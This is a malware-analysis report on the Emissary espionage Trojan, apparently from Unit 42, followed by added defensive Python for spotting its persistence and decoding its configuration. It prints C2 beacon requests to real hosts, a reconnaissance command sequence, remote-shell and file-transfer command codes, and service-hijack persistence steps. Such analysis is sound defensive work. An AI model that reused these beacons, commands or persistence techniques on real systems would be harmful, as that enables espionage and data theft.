In December 2015, Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a payload. Emissary is related to the Elise Trojan and the Operation Lotus Blossom attack campaign, which prompted us to start collecting additional samples of Emissary. The oldest sample we found was created in 2009, indicating this tool has been in use for almost seven years. Of note, this is three years earlier than the oldest Elise sample we have found, suggesting this group has been active longer than previously documented. In addition, Emissary appears to be used only against Taiwanese or Hong Kong based targets: all of the decoys are written in Traditional Chinese, and they use themes related to the government or military.

We also found several different versions of Emissary whose iterative changes show how the Trojan evolved over the years. One of the most interesting observations made during this analysis is that the amount of development effort devoted to Emissary significantly [increased after we published our Operation Lotus Blossom report in June 2015](http://researchcenter.paloaltonetworks.com/2015/06/operation-lotus-blossom/), resulting in many new versions of the Emissary Trojan. We also observed a TTP shift post publication with regards to malware delivery: the actors started using compromised but legitimate domains to serve their malware. Interestingly, the C2 infrastructure is also somewhat different than that used by Elise.

In contrast to Elise, which was used in attacks against multiple Southeast Asian countries in region-appropriate languages, all of the Emissary decoys we have collected are written in Traditional Chinese, which is used primarily in Taiwan and Hong Kong. The targets we have identified are also limited to those two regions. Despite appearing to target a more limited geographical range, Emissary targeted the government, higher education, and high tech companies with a mix of copied news articles and documents that do not appear to be available online.
Decoys include:

- An Excel spreadsheet containing legitimate contact information for much of the Taiwanese government that does not appear to be available online.
- A copy of a news article in which the Deputy Commander of the Nanjing Military Region, Wang Huanguang, responds negatively to a 2014 magazine article by a respected US Taiwan scholar saying the odds of China and Taiwan reuniting are low and discussing the issues with an attempted military takeover.
- A copy of a news article from 2010 about the Chinese League of Victims protesting the involuntary removal of Shanghai residents in the lead-up to the Shanghai Expo.
- A copy of the official Taiwan holiday schedule for 2016, which is the 105th anniversary of the current Taiwanese government.

Posted by Robert Falcone and Jen Miller-Osborn on February 3, 2016 11:00 AM. Filed in: Malware, Threat Prevention, Unit 42. Tagged: AutoFocus, cyber espionage, cybersecurity, Elise, Emissary, Espionage, Lotus Blossom, Trojans.
Figure 1: Partial screenshot of the response from Deputy Commander of the Nanjing Military Region Wang Huanguang.

We have expanded our knowledge of Emissary infrastructure significantly since our first Emissary blog and have found almost exclusive use of Dynamic DNS (DDNS) domains, with only one domain purchased from a Chinese reseller. In contrast, the Elise samples used a mix of actor-registered and DDNS domains, with the actor-registered domains serving as one of the data points we used to tie all of the activity together.
While the use of DDNS can make tying activity together more difficult, and despite the new Emissary variants released since our publication, two of the most recent C2s resolved to IPs used by Elise C2s detailed in Operation Lotus Blossom. Emissary samples typically have three hardcoded C2s that are a mix of IPs and domain names, with one domain or IP not shared with the other C2s, in a likely effort to avoid loss of control. A full IOC list is included at the end of this report.

Also new is the actors' use of compromised legitimate Taiwanese websites to serve their malware, including the official website of the Democratic Progressive Party (DPP). This is particularly interesting as Taiwan had just held a closely watched Presidential election on 16 January, which DPP candidate Tsai Ing-wen won. This marked the first time a woman was elected President of Taiwan and only the second time a member of the Kuomintang did not hold the office since the party was ousted from China in 1949 when the Communist Party of China took power. In line with her party's stance, she is widely seen as a proponent of an independent Taiwan and not in favor of reunification with the People's Republic of China.

Our evidence suggests that malware authors created Emissary as early as 2009, and that threat actors have relied on this tool as a payload in cyber-espionage attacks for many years. The Emissary Trojan is a capable tool for gaining a foothold on a targeted system. While it lacks more advanced functionality such as screen capturing, it can still carry out most tasks threat actors want: exfiltrating files, downloading and executing additional payloads, and providing remote shell access.
It appears that threat actors have continually used this Trojan and developed several updated versions of Emissary to remain undetected and fresh over time.

We analyzed all of the known Emissary samples to determine what changes the malware author made between the different versions of the Trojan. During our analysis, we examined when each sample was created based on its compile time and produced a simple timeline, seen in Figure 2, to display the development effort expended on the Emissary Trojan. It should be noted that some Emissary samples have been used multiple times with different configurations, so the timeline only shows when development activity took place on Emissary and should not be misconstrued as showing when Emissary was used in attacks.

The timeline in Figure 2 shows that the Emissary Trojan was first created (version 1.0) in May 2009 and quickly received an update that resulted in version 1.1 in June 2009. The Trojan did not receive much in the way of updates until September 2011, when the author released version 2.0. Version 2.0 received one update in October 2013 before the malware author released version 3.0 in December 2014. The malware author released version 4.0 in March 2015, but curiously created a version 3.0 sample afterwards, on June 26, 2015, which was out of sequence with the incrementing versioning. Between August and November 2015 the malware author created several new versions of Emissary, specifically 5.0, 5.1, 5.3 and 5.4, in a much

Figure 2: Timeline of development efforts spent on Emissary

The out-of-sequence version 3.0 appears to be an early variant of version 5.0, based on significant similarities (discussed in the changelog section) that are not seen in the original version 3.0 and other earlier versions of Emissary.
One campaign code associated with the out-of-sequence version 3.0 sample was "3test", suggesting the malware author created it for testing purposes. The other campaign code associated with the out-of-sequence sample was "IC00001", which could denote an attack payload, as it appears to be a plausible code for describing a campaign.

While this may be coincidental, the out-of-sequence version 3.0 sample was created ten days [after we published the Operation Lotus Blossom paper](http://researchcenter.paloaltonetworks.com/2015/06/operation-lotus-blossom/) that exposed the Elise Trojan, which is closely related to Emissary. It is possible that the threat actors were prompted to make malware changes in response to our research. Regardless of causation, the rapid development of new versions of Emissary suggests that the malware authors are making frequent modifications to evade detection, which in turn suggests the threat actors are actively using the Emissary Trojan as a payload in attacks.

In this section, we discuss the changes observed between each version of Emissary. As this section is focused on changes, the features and functionality are the same between Emissary versions unless otherwise mentioned.

**Date:** 5/12/2009
**SHA256:** a7d07b92e48876e2195e5d8769a47cf0a237e11ac304e41b14fc36042b0d9484
**Original Name:** WUMsvc.dll
**Initial Release**

The initial loader Trojan writes Emissary to %SYSTEM%\WSPsvc.dll and installs it as a service, which will run the exported function "ServiceMain" within the Emissary Trojan to carry out its functionality.

Configuration data is stored in the last 1024 bytes of the payload, from which the Trojan extracts an 896-byte structure.
The configuration is decrypted with an algorithm that XORs each byte with a value taken from a different offset within the ciphertext.

The code creates the following registry keys:

```
HKEY_CLASSES_ROOT\Shell.LocalServer\CheckCode
HKEY_CLASSES_ROOT\Shell.LocalServer\CheckID
```

The malware performs initial system information gathering and saves the data to a file named TMP2548. The initial gathering relies on the following commands, executed through the command prompt (each ECHO line labels the output of the command that follows it):

```
ECHO VER
VER
ECHO IPCONFIG /ALL
IPCONFIG /ALL
ECHO NET LOCALGROUP ADMINISTRATORS
NET LOCALGROUP ADMINISTRATORS
ECHO NET START
NET START
ECHO GPRESULT /Z
GPRESULT /Z
ECHO GPRESULT /SCOPE COMPUTER /Z
GPRESULT /SCOPE COMPUTER /Z
ECHO SYSTEMINFO
SYSTEMINFO
```

Emissary parses command and control responses for "instru", which precedes a GUID value designating the command the C2 server wishes to execute on the system. The command handler does not use a nested if/else or switch statement like most malware families; instead, Emissary builds a structure containing all of the available command GUIDs and iterates through it each time the C2 supplies a GUID in order to determine which command the operator wishes to execute. The structure can hold up to 32 different commands, but the author chose to include six commands within the Trojan.
The following is the command handler structure used by Emissary v1.0:

```c
struct EMISSARY_COMMAND
{
    CHAR  guid[40];
    DWORD sub_function;
    DWORD arg1_subfunction;
    DWORD arg2_subfunction;
    DWORD arg3_subfunction;
};

struct commandHandler
{
    DWORD number_of_commands;
    DWORD unused;
    struct EMISSARY_COMMAND cmd_0;
    struct EMISSARY_COMMAND cmd_1;
    struct EMISSARY_COMMAND cmd_2;
    struct EMISSARY_COMMAND cmd_3;
    struct EMISSARY_COMMAND cmd_4;
    struct EMISSARY_COMMAND cmd_5;
};
```

Table 1 contains the commands available within the Emissary v1.0 command handler.

| Command | Description |
|---|---|
| bac84b12-5b0b-491f-a885-8667d156394f | Upload file. |
| 3d8313cc-53ca-4751-bbbf-ea5f914f8e65 | Download file. |
| db0e93e7-b46c-4cba-81f1-ec70da57dc19 | Update config. The C2 specifies the fields as: p1 = C2 server 1, p2 = C2 server 2, p3 = C2 server 3, p4 = sleep interval, p5 = system identifier (computer name), p6 = GUID for beacon. |
| 2e382e51-3089-4293-8454-5eccb253eb54 | Execute a specified command. |
| a57db08a-bf97-4b43-b27d-157e62e2fd74 | Create remote shell. |
| eab5c1ab-a497-4fc2-bbe0-049be45d6f2d | Update Trojan with new executable. |

Table 1: Emissary v1.0 command handler

The Emissary version 1.0 beacon to the C2 server appears as follows:

```
GET /VSNET/default.aspx HTTP/1.1
User-Agent: Mozilla/4.0
Host: 193.34.144[.]21
Cookie: guid=af44f802-ba5c-4b3c-8c6b-2ea411058678; op=1635b097-ffe4-
```

**Date:** 5/31/2009
**SHA256:** e6c4611b1399ada920730686395d6fc1700fc39add3d0d40b4f784ccb6ad0c30
**Original Name:** WUMsvc.dll

Removed checks for "//" and "/" in the update configuration command when updating the three C2 servers.

**Date:** 6/5/2009
**SHA256:** 931a1284b11a3997c7a99076d582ed3436aa30409dc73bd763436dddd490f9cb
**Original Name:** WUMsvc.dll

Bug fixes:

- Added code to make sure the content received from the C2 server matches the "Content-Length" value in the HTTP response.
- Added code to allow downloads of more than 524,288 bytes.

The Emissary v1.1 C2 beacon appears as follows; it has not changed since version 1.0:

```
GET /eng/comfunc/comfunc/default.aspx HTTP/1.1
User-Agent: Mozilla/4.0
Host: 137.189.145.1
Cookie: guid=af44f802-ba5c-4b3c-8c6b-2ea411058678; op=1635b097-ffe4-
```

**Date:** 9/15/2011
**SHA256:** 5edf2d0270f8e7eb5be3476802e46c578c4afc4b046411be0806b9acc3bfa099
**Original Name:** EmissaryDll.dll

Version 2.0 was a significant rewrite of the Emissary Trojan.

The configuration data for the Trojan is still saved to the registry, but the registry key has changed to:

```
SOFTWARE\Microsoft\VBA\VbaData
```

The configuration structure also changed in size, to 464 bytes. The Emissary configuration is now encrypted using a custom algorithm that calls "srand" with the constant 2563 to seed the "rand" function.
Because the seed is constant, "rand" produces the same sequence of values every time, and Emissary uses those values as the key for an XOR operation. The configuration now contains the version number of Emissary, instead of the version being hardcoded into the Trojan.

This version of Emissary keeps track of which C2 location within its configuration it has been communicating with by storing the index of the C2 server (1, 2, or 3) in the following registry key:

```
SOFTWARE\Microsoft\VBA\VbaList
```

This version of Emissary moves away from the structure-based command handler to a nested if/else statement for less complicated command handling; however, the command GUIDs and the commands themselves are unchanged.

The Emissary version 2.0 beacon changed slightly from previous versions, specifically the removal of the User-Agent field and the use of a lowercase "h" in the "Host" field. The following is an example of the version 2.0 beacon, which contains the same GUID and "op" values:

```
GET /0test/test/default.aspx HTTP/1.1
host: 163.20.127.27
Cookie: guid=af44f802-ba5c-4b3c-8c6b-2ea411058678; op=1635b097-ffe4-
```

Version 2.0 also introduces a debug message logging system with verbose error messages that are accompanied by an error ID number. Error messages are written to the file %TEMP%\em.log. The following is a list of the debug messages:
```
emissarydll.cpp - 0x3b - InitApp() - create work thread
shell.cpp - 0x30 - SendShellOutputThread - PeekNamedPipe - Error :
shell.cpp - 0x3e - SendShellOutputThread() : Timeout
shell.cpp - 0x53 - SendShellOutputThread - ReadFile - Error : 0x%08
shell.cpp - 0x5b - SendShellOutputThread - send - Error : 0x%08x
shell.cpp - 0x62 - SendShellOutputThread() : thread exit
shell.cpp - 0x7f - RecvShellCmdThread - recv - Error : 0x%08x
shell.cpp - 0x89 - RecvShellCmdThread - WriteFile - Error : 0x%08x
shell.cpp - 0x8f - RecvShellCmdThread() : thread exit
shell.cpp - 0xeb - Error occured : %s [%d]
shell.cpp - 0xfa - TerminateThread Input Thread
shell.cpp - 0x100 - TerminateThread Output Thread
shell.cpp - 0x118 - SocketShell - Fail To Create Reverse Socket
shell.cpp - 0x12f - SocketShell - Fail To Generate Reverse Shell
shell.cpp - 0x13a - SocketShell - SocketShell - Fail To Generate R
shell.cpp - 0x13e - SocketShell - Create Reverse Shell Thread OK
config.cpp - 0x38 - RegCreateKeyEx error : %0x08x
config.cpp - 0x46 - RegSetValueEx error : %0x08x
config.cpp - 0x5e - ReadConfig - RegCreateKeyEx error : 0x%08x
config.cpp - 0x66 - ReadConfig - RegQueryValueEx error : 0x%08x
config.cpp - 0xab - find user: %s
config.cpp - 0xbc - can not find proxy
config.cpp - 0xc7 - get ProxySetting failed
config.cpp - 0xd4 - find proxy server : %s
run.cpp - 0x75 - InitConfig: [g_ServerPath:%s] [g_ServerName:%
run.cpp - 0x9d - InitConfig: [g_DelayTime:%d]
run.cpp - 0xbe - get proxy the last time used:%s
run.cpp - 0xc3 - server index:%d
run.cpp - 0xd9 - RetryTimes = %d
run.cpp - 0xec - connect %s error :%s
run.cpp - 0x10c - process a request ok.
httpclient.cpp - 0x98 - ASP.NET_SessionId长度[异常]:[%d][%s]   (translation: "ASP.NET_SessionId length [abnormal]")
httpclient.cpp - 0xd0 - ******not connected !
httpclient.cpp - 0xf4 - read hread error : %s
httpclient.cpp - 0x102 - body length = 0
httpclient.cpp - 0x13d - decrypt error"
httpclient.cpp - 0x211 - instruction :
httpclient.cpp - 0x21d - no instruction guid
httpclient.cpp - 0x22c - OP_DOWNLOAD no local file name
httpclient.cpp - 0x23b - OP_UPLoad no local file name
httpclient.cpp - 0x249 - OP_UPLoad no local file name
httpclient.cpp - 0x242 - OP_UPLoad no local file name
httpclient.cpp - 0x25b - OP_EXECUTE no cmd list
httpclient.cpp - 0x262 - OP_EXECUTE no timeout
httpclient.cpp - 0x2b4 - OP_SHELL ip
httpclient.cpp - 0x2bb - OP_SHELL port
httpclient.cpp - 0x2dd - OP_CHANGECONFIG server1
httpclient.cpp - 0x2e4 - OP_CHANGECONFIG server2
httpclient.cpp - 0x2eb - OP_CHANGECONFIG server3
httpclient.cpp - 0x2f2 - OP_CHANGECONFIG timestr
httpclient.cpp - 0x2f9 - OP_CHANGECONFIG namestr
httpclient.cpp - 0x300 - OP_CHANGECONFIG guid
httpclient.cpp - 0x321 - not connected
httpclient.cpp - 0x361 - send msg error
httpdoinstruction.cpp - 0x28 - DownloadFile - LocalFileName=%s
httpdoinstruction.cpp - 0x5c - download file http head:%s
httpdoinstruction.cpp - 0x7a - download file ok
httpdoinstruction.cpp - 0xac - UploadFile - LocalFileName=%s
httpdoinstruction.cpp - 0xb4 - DownloadFile - Error - Open File [%S
httpdoinstruction.cpp - 0xc7 - UploadFile:TotalLength=%d
httpdoinstruction.cpp - 0x124 - download file http head:%s
```

**Date:** 10/24/2013
**SHA256:** 9dab2d1b16eb0fb4ec2095d4b4e2a3ad67a707ab4f54f9c26539619691f103f3
**Original Name:** NetPigeon_DLL.dll

This update to Emissary allowed the Trojan to run as a service. The configuration now contains settings for the Emissary service, which the Trojan stores in and reads from the following registry keys:

```
SOFTWARE\Microsoft\VBA\Serv    -> Service Name
SOFTWARE\Microsoft\VBA\VbaList -> Binary Path for the Service
```

Also, this version of Emissary was created using Microsoft Foundation Classes (MFC) to carry out the majority of its functionality. For instance, instead of manually building an HTTP request as in previous versions, this version uses the following MFC functions to create the HTTP request and send it to the C2 server:

```
CInternetSession::CInternetSession
CInternetSession::GetHttpConnection
CHttpConnection::OpenRequest
CHttpFile::AddRequestHeaders
CInternetSession::SetCookie
CHttpFile::SendRequest
```

Compared with the version 2.0 beacon, the MFC-built request uses HTTP/1.0 and carries Cache-Control and User-Agent headers within the HTTP header:

```
GET /lightserver/Default.aspx HTTP/1.0
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: groupspace.findhere.org
Cookie: guid=8E550BBD-F5DB-4471-BBC7-E8768BD5003E; op=1635b097-ffe4-
```

The logging functionality within this update no longer includes error ID values, but still contains verbose debug messages, which are written to a file named %TEMP%\msmqinst.ax.

**Date:** 12/24/2014
**SHA256:** dcbeca8c92d6d18f2faf385e677913dc8abac3fa3303c1f5cfe166180cffbed3
**Original Name:** Generic.dll

Bug fixes:

- Added a function to the configuration update command that checks whether the C2 provided a new sleep interval at offset 460 and falls back to the interval stored in the VbaData registry key if
it is missing. This fixes a bug that prevented the sleep interval from updating correctly.

**Date:** 3/26/2015
**SHA256:** 5171c9a593389011da4d72125e52bf7ef86b2da7fcd6c2a2bc95467afe6a1b58
**Original Name:** Generic.dll

This version of Emissary includes both the installation and loading functionality and the Emissary functional code in the same file. The installation and loading portion of the Trojan is called through an exported function named "Setting", which moves the file to:

```
%TEMP%\Remdisk.dll
```

The loading portion of this version checks the permissions of the current user and installs Emissary either as a service or as a standalone Trojan. To install as a service, the loader enumerates the services on the system looking for services running under the "netsvcs" group, and attempts to hijack the first "netsvcs" service it finds by replacing its "ServiceDll" parameter so that it points to the Emissary DLL. For instance, during the analysis period, the installation code changed the ServiceDll value of the AppMgmt service to point to the Emissary DLL:

```
HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters\ServiceDll
```

If the user does not have permission to add a service, the installation routine instead establishes persistence by creating the following registry value, which runs the functional code within Emissary via an exported function named "DllRegister":

```
Software\Microsoft\Windows\CurrentVersion\Run\Resolves: "Rundll32.ex
```

This version of Emissary has its configuration appended to the end of the DLL, specifically starting at offset 0xC600.
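Before looking at the appended configuration, here is a triage check for the two persistence paths just described: a netsvcs member whose ServiceDll has been redirected to a user-writable location, and a Run value that uses rundll32 to call an export from such a DLL. This is an added example, not Unit 42's code or anything taken from the malware. The registry snapshot in it is constructed to mirror the AppMgmt hijack described above; the exact Run command is truncated on the page, so the `Rundll32.exe "%TEMP%\Remdisk.dll",DllRegister` line is an assumption. `load_live_snapshot()` shows how the same data would be read on a Windows host with the standard `winreg` module; it is not called in the offline demo.

```python
"""Triage check for the Emissary 4.0 persistence paths (added example)."""
import re
import sys

# Directories a legitimate netsvcs ServiceDll is expected to live under.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# rundll32 <dll>,<export> with optional quoting, case-insensitive.
RUNDLL_RE = re.compile(r'^"?rundll32(?:\.exe)?"?\s+"?([^",]+)"?\s*,\s*(\w+)', re.I)


def normalize_path(path):
    """Lower-case the path and expand the common %SystemRoot% / %windir% prefixes."""
    p = path.strip().strip('"').lower()
    for var in ("%systemroot%", "%windir%"):
        p = p.replace(var, "c:\\windows")
    return p


def under_system_dir(path):
    return normalize_path(path).startswith(SYSTEM_DIRS)


def check_netsvcs(services, netsvcs_group):
    """Flag netsvcs members whose ServiceDll points outside the system directories.

    Emissary 4.0 rewrites the ServiceDll of the first netsvcs service it finds
    (AppMgmt in the analysed sample) to its own DLL under %TEMP%, so a ServiceDll
    in a user-writable location is the signal here.
    """
    findings = []
    for name in netsvcs_group:
        dll = services.get(name, {}).get("ServiceDll")
        if dll and not under_system_dir(dll):
            findings.append(f"service {name}: ServiceDll outside System32: {dll}")
    return findings


def check_run_keys(run_values):
    """Flag Run entries that use rundll32 to call an export from a DLL outside System32."""
    findings = []
    for name, command in run_values.items():
        m = RUNDLL_RE.match(command.strip())
        if m and not under_system_dir(m.group(1)):
            findings.append(f"Run value {name}: rundll32 loads {m.group(1)} export {m.group(2)}")
    return findings


def load_live_snapshot():
    """Read the netsvcs group, each member's ServiceDll and both Run keys (Windows only)."""
    import winreg  # standard library, importable only on Windows
    hklm = winreg.HKEY_LOCAL_MACHINE
    with winreg.OpenKey(hklm, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost") as k:
        netsvcs = winreg.QueryValueEx(k, "netsvcs")[0]
    services = {}
    for name in netsvcs:
        try:
            with winreg.OpenKey(hklm, "SYSTEM\\CurrentControlSet\\Services\\" + name + "\\Parameters") as k:
                services[name] = {"ServiceDll": winreg.QueryValueEx(k, "ServiceDll")[0]}
        except OSError:
            continue
    run = {}
    for root in (hklm, winreg.HKEY_CURRENT_USER):  # no-admin install uses the user hive
        try:
            with winreg.OpenKey(root, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") as k:
                i = 0
                while True:
                    try:
                        name, value, _ = winreg.EnumValue(k, i)
                    except OSError:
                        break
                    run[name] = str(value)
                    i += 1
        except OSError:
            continue
    return services, netsvcs, run


# Constructed snapshot (not real host data) mirroring the hijack described in the text.
SAMPLE_NETSVCS = ["AppMgmt", "Browser", "Schedule"]
SAMPLE_SERVICES = {
    "AppMgmt": {"ServiceDll": "%TEMP%\\Remdisk.dll"},  # hijacked, as in the analysed sample
    "Browser": {"ServiceDll": "%SystemRoot%\\System32\\browser.dll"},
    "Schedule": {"ServiceDll": "%SystemRoot%\\system32\\schedsvc.dll"},
}
SAMPLE_RUN = {
    "Resolves": 'Rundll32.exe "%TEMP%\\Remdisk.dll",DllRegister',  # assumed full command
    "SecurityHealth": "%windir%\\system32\\SecurityHealthSystray.exe",
}


def triage(services, netsvcs_group, run_values):
    return check_netsvcs(services, netsvcs_group) + check_run_keys(run_values)


if __name__ == "__main__":
    if sys.platform == "win32" and "--live" in sys.argv:
        services, group, run = load_live_snapshot()
    else:
        services, group, run = SAMPLE_SERVICES, SAMPLE_NETSVCS, SAMPLE_RUN
    for line in triage(services, group, run):
        print(line)
```

Run without arguments the script checks the constructed snapshot and reports the AppMgmt ServiceDll and the Resolves Run value; with `--live` on a Windows host it reads the real keys. The check is deliberately generic: any netsvcs member whose DLL lives outside System32 is worth a look, not only AppMgmt.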
The following code accesses the configuration embedded within the DLL and decodes it with a single-byte key of 65. Note that the decompiled loop adds 65 to each byte rather than XORing it, so the decoding operation is addition modulo 256 with a fixed key:

```c
SetFilePointer(h_emissary_dll_file, 0xC600, 0, 0);
ReadFile(h_emissary_dll_file, buffer_for_config, 0x1D0u, &NumberOfBytesRead, NULL);
iteration_count = 0;
do
    *(iteration_count++ + buffer_for_config) += 65;
while ( iteration_count < 0x1D0 );
```

This algorithm differs from the one introduced in Emissary version 2.0, which used the srand and rand functions to generate a key for use with the XOR operation. Because the configuration is embedded within the Emissary DLL, each Emissary version 4.0 sample will have a different hash as the configuration data changes.

The network beacon sent by Emissary version 4.0 is the same as that of previous versions starting at version 2.0, as seen in the following:

```
GET /lightserver/Default.aspx HTTP/1.0
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 210.209.121.92
Cookie: guid=7DA53AE4-C155-40b3-8EB3-60C4FCE99025; op=1635b097-ffe4-
```

**Date:** 6/25/2015
**SHA256:** 70bed57bc3484fe5dbcf3c732bd7b11f80a742138f4733bc7e9b6d03e721da4a
**Original Name:** IISDLL.dll
**Major Overhaul**

The compilation time of one sample of Emissary version 3.0, June 25, 2015, appears out of order, as it falls after the compilation of Emissary version 4.0.
The differences between this out-of-order sample and the other known version 3.0 sample, as well as version 4.0 for that matter, include a dramatic change in configuration storage and in the handling of commands. Also, the files stored on the system have different names than in past Emissary versions:

```
%TEMP%\000IISA758C8FEAE5F.TMP      -> Log file
%APPDATA%\LocalData\75BD50EC.DAT   -> Configuration file
%APPDATA%\LocalData\A08E81B411.DAT -> Emissary DLL
```

This version of Emissary is designed to be injected into an Internet Explorer process by its associated loader Trojan, which marks the first time Emissary executes through DLL injection.

This version of Emissary also has a different configuration structure than prior versions. The configuration is no longer stored in the registry; rather, it is saved to a file named 75BD50EC.DAT. The Emissary DLL seeks to offset 0x488 within this file and reads the next 132 bytes, which it decrypts with a new algorithm, as seen in the following:

```c
SetFilePointer(h_config_file, 0x488, 0, 0);
ReadFile(h_config_file, buffer_for_config, 132u, &NumberOfBytesRead, NULL);
CloseHandle(h_config_file);
srand(0xA03u);
iteration_count = 0;
do
    *(buffer_for_config + iteration_count++) ^= rand() % 128;
while ( iteration_count < 0x84 );
```

The configuration structure has also changed, with Emissary now using the following structure:

```c
struct emissary_new_config
{
    WORD Emissary_version_major;
    WORD Emissary_version_minor;
    CHAR GUID_for_sample[36];
    WORD Unknown1;
    CHAR Server1[128];
    CHAR Server2[128];
    CHAR Server3[128];
    CHAR CampaignName[128];
    CHAR Unknown2[550];
    WORD Delay_interval_seconds;
};
```

This version of Emissary also introduced a new command handler that uses number-based commands instead of the GUID commands seen in prior versions of Emissary. The functionality of the commands is the same; however, the commands themselves are invoked using a number. Table 2 lists the available commands with a brief description of the functionality each carries out.

| Command | Description |
|---|---|
| 102 | Upload a file to the C2 server. |
| 103 | Executes a specified command. |
| 104 | Download file from the C2 server. |
| 105 | Update configuration file. |
| 106 | Create a remote shell. |
| 107 | Updates the Trojan with a new executable. |

Table 2: New Emissary command handler

The network beacon sent by this version of Emissary is very similar to the beacon first introduced in Emissary version 2.0; however, the "op" value "101" is hardcoded for the beacon and replaces the GUID-based op designator to match the new command handler. The recoverable portion of the beacon is:

```
Cache-Control: no-cache
Cookie: guid=cae5e213-395a-4023-9a12-f78d3c4718e5; op=101
```

**Date:** 8/25/2015
**SHA256:** c145bb2e4ce77c79aa01de2aec4a8b5b0b680e23bceda2c230903b5f0e119634
**Original Name:** WinDLL.dll

Emissary version 5.0 closely resembles the out-of-order version 3.0 sample, which suggests that the malware author simply forgot to change the version number of the out-of-order sample. While the configuration and Emissary DLL filenames used by the version 5.0 sample are the same as those of the out-of-order version 3.0 sample, the log file name differs slightly, as seen in the following list of related files:

```
%TEMP%\000A758C8FEAE5F.TMP         -> Log file
%APPDATA%\LocalData\75BD50EC.DAT   -> Configuration file
%APPDATA%\LocalData\A08E81B411.DAT -> Emissary DLL
%APPDATA%\LocalData\ishelp.dll     -> Loader DLL
```
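The two configuration schemes described above (the 0x1D0-byte block appended to a version 4.0 DLL at 0xC600 and decoded with the single-byte key 65, and the 132-byte region at 0x488 of 75BD50EC.DAT that the out-of-order 3.0 and 5.0 samples XOR with `rand() % 128` after `srand(0xA03)`) are both reproducible offline, because neither depends on a per-sample secret. The following is an added example, not Unit 42's or the malware author's code. The only knowledge it adds beyond the page is the Microsoft C runtime `rand()` generator, the LCG `state = state * 214013 + 2531011 (mod 2^32)` returning `(state >> 16) & 0x7FFF`, which is what `srand`/`rand` resolve to in an MSVC-built DLL. The offsets, lengths, seed and key are taken from the analysis; every function name and the sample configuration are constructed for the demo. Two caveats: the decompiled 4.0 loop adds 65 to each byte, so the decoder here adds rather than XORs; and the analysis reads only 132 bytes at 0x488 while the `emissary_new_config` structure it documents is 1,106 bytes long, so the structure parser is kept separate from the file-offset extractor and is demonstrated on a full constructed structure. The version 2.0 scheme (seed 2563) reuses the same idea, but the page does not give its byte reduction or layout, so it is not implemented.

```python
"""Decoders for the Emissary 4.0 and 5.0 configuration schemes (added example)."""
import struct

# Version 4.0: config appended to the DLL, 0x1D0 bytes at 0xC600, one-byte key 65 (added).
V4_CONFIG_OFFSET = 0xC600
V4_CONFIG_LEN = 0x1D0
V4_KEY = 65

# Out-of-order 3.0 / 5.0: 132 bytes at 0x488 of 75BD50EC.DAT, XOR rand() % 128, srand(0xA03).
V5_CONFIG_OFFSET = 0x488
V5_CONFIG_LEN = 132
V5_SEED = 0xA03

# emissary_new_config, little-endian, packed, field order as documented in the analysis.
NEW_CONFIG_FMT = "<HH36sH128s128s128s128s550sH"
NEW_CONFIG_LEN = struct.calcsize(NEW_CONFIG_FMT)  # 1106 bytes


def msvc_rand(seed):
    """Yield the MSVCRT rand() sequence that follows srand(seed).

    The Microsoft C runtime generator is the LCG
    state = state * 214013 + 2531011 (mod 2**32), rand() = (state >> 16) & 0x7FFF.
    A constant seed makes the whole keystream reproducible, which is why the
    scheme can be decrypted without any sample-specific secret.
    """
    state = seed & 0xFFFFFFFF
    while True:
        state = (state * 214013 + 2531011) & 0xFFFFFFFF
        yield (state >> 16) & 0x7FFF


def rand_xor(data, seed):
    """XOR each byte with rand() % 128, as the decompiled loop does (self-inverse)."""
    return bytes(b ^ (r % 128) for b, r in zip(data, msvc_rand(seed)))


def extract_v5_config(dat_file):
    """Return the decrypted 132-byte region Emissary 5.0 reads from 75BD50EC.DAT."""
    blob = dat_file[V5_CONFIG_OFFSET:V5_CONFIG_OFFSET + V5_CONFIG_LEN]
    if len(blob) != V5_CONFIG_LEN:
        raise ValueError("file too short for an Emissary 5.0 configuration")
    return rand_xor(blob, V5_SEED)


def decrypt_v4_config(dll_file):
    """Decode the 0x1D0-byte config appended to an Emissary 4.0 DLL.

    The decompiled loop adds 65 to every byte, so decoding is addition mod 256.
    """
    blob = dll_file[V4_CONFIG_OFFSET:V4_CONFIG_OFFSET + V4_CONFIG_LEN]
    if len(blob) != V4_CONFIG_LEN:
        raise ValueError("file too short for an Emissary 4.0 configuration")
    return bytes((b + V4_KEY) & 0xFF for b in blob)


def encode_v4_config(plain):
    """Inverse of decrypt_v4_config, used here only to build test input."""
    return bytes((b - V4_KEY) & 0xFF for b in plain)


def _cstr(raw):
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def parse_new_config(buf):
    """Parse a decrypted emissary_new_config structure into a dict."""
    if len(buf) < NEW_CONFIG_LEN:
        raise ValueError("buffer shorter than emissary_new_config")
    major, minor, guid, _unk1, s1, s2, s3, campaign, _unk2, delay = struct.unpack_from(NEW_CONFIG_FMT, buf)
    return {
        "version": f"{major}.{minor}",
        "guid": _cstr(guid),
        "servers": [_cstr(s) for s in (s1, s2, s3) if _cstr(s)],
        "campaign": _cstr(campaign),
        "delay_seconds": delay,
    }


def build_sample_config(major, minor, guid, servers, campaign, delay):
    """Constructed sample structure (not real Emissary data) for the demo."""
    s = list(servers) + [""] * (3 - len(servers))
    return struct.pack(NEW_CONFIG_FMT, major, minor, guid.encode(), 0,
                       s[0].encode(), s[1].encode(), s[2].encode(),
                       campaign.encode(), b"\0" * 550, delay)


def demo():
    """Round-trip both schemes on the constructed sample; returns (v5_ok, v4_ok, parsed)."""
    cfg = build_sample_config(5, 0, "cae5e213-395a-4023-9a12-f78d3c4718e5",
                              ["203.0.113.10", "c2.example.invalid"], "3test", 300)
    dat = b"\0" * V5_CONFIG_OFFSET + rand_xor(cfg[:V5_CONFIG_LEN], V5_SEED)
    dll = b"\0" * V4_CONFIG_OFFSET + encode_v4_config(cfg[:V4_CONFIG_LEN])
    v5_ok = extract_v5_config(dat) == cfg[:V5_CONFIG_LEN]
    v4_ok = decrypt_v4_config(dll) == cfg[:V4_CONFIG_LEN]
    return v5_ok, v4_ok, parse_new_config(cfg)


if __name__ == "__main__":
    print(demo())
```

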